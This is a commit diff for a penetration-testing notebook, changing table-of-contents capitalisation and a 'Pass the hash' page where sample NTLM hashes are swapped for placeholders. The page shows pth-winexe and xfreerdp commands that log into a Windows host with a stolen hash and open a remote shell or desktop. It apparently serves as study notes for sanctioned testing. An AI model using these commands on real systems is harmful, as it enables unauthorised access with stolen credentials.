Commit bfe1cfd5 authored by bobloblaw's avatar bobloblaw
Browse files

Updates pass_the_hash_-_reusing_hashes.md

Auto commit by GitBook Editor
parent e155691f
Loading
Loading
Loading
Loading
+4 −4
Original line number Diff line number Diff line
@@ -78,10 +78,10 @@
    * [Persistence](persistence.md)
    * [Cover your tracks](clean_up.md)
* [Password Cracking](password-cracking.md)
    * [Generate custom wordlist](generate_custom_wordlist.md)
    * [Offline password cracking](identify_hash_and_crack_it.md)
    * [Online password cracking](online_password_cracking.md)
    * [Pass the hash - reusing hashes](pass_the_hash_-_reusing_hashes.md)
    * [Generate Custom Wordlist](generate_custom_wordlist.md)
    * [Offline Password Cracking](identify_hash_and_crack_it.md)
    * [Online Password Cracking](online_password_cracking.md)
    * [Pass the Hash - Reusing Hashes](pass_the_hash_-_reusing_hashes.md)
* [Pivoting - Port forwarding - Tunneling](port_forwarding_and_tunneling.md)
* [Binary Exploitation](binary_exploitation2.md)
    * [Tools](tools.md)
+3 −3
Original line number Diff line number Diff line
# Pass the hash - reusing hashes

Pass the hash (PTH) is a technique that lets the user authenticate by using a vlaid username and the hash, instead of the unhashed password. So if you have gotten a hold of a hash you might be able to use that hash against another system.
Pass the hash (PTH) is a technique that lets the user authenticate by using a valid username and the hash, instead of the unhashed password. So if you have gotten a hold of a hash you might be able to use that hash against another system.

Pass the hash is a suite of different tools. 

@@ -19,7 +19,7 @@ pth-winexe -U administrator //192.168.1.101 cmd
I think you can run it like this too:

```
pth-winexe -U admin/aad3b435b51404eeaad3b435b51404ee:d4bf5a8658af50fd1d2b8dbb10859741 //192.168.0.101 cmd
pth-winexe -U admin/hash:has //192.168.0.101 cmd
```

## Remote Desktop
@@ -31,7 +31,7 @@ apt-get install freerdp-x11
```

```
xfreerdp /u:admin /d:win7 /pth:aad3b435b51404eeaad3b435b51404ee:d4bf2a5658af10fd1d1b8dbb60859746 /v:192.168.1.101
xfreerdp /u:admin /d:win7 /pth:hash:hash /v:192.168.1.101
```

https://www.kali.org/penetration-testing/passing-hash-remote-desktop/
 No newline at end of file